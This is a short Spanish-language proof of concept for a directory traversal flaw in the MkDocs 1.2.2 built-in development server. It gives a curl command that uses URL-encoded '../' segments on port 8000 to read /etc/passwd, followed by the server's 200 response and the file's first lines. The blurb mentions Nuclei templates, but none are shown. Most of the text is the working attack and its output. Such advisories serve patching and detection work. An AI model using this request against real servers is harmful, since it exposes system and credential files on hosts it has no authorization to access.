
Prueba de concepto para el recorrido de directorios en el servidor de desarrollo integrado de MkDocs 1.2.2, que permite la lectura arbitraria de archivos mediante un recorrido de rutas codificado. Incluye ejemplos de plantillas de curl y Nuclei.
explotación de directory traversal en el servidor de desarrollo integrado de mkdocs
Mkdocs 1.2.2 permite el directory traversal a través del servidor de desarrollo integrado que responde en el puerto 8000. A continuación se muestran algunos ejemplos de rutas explotadas con éxito:
Usando esta técnica es posible obtener archivos fuera del directorio raíz, permitiendo a cualquiera leer y descargar archivos arbitrarios.



curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...
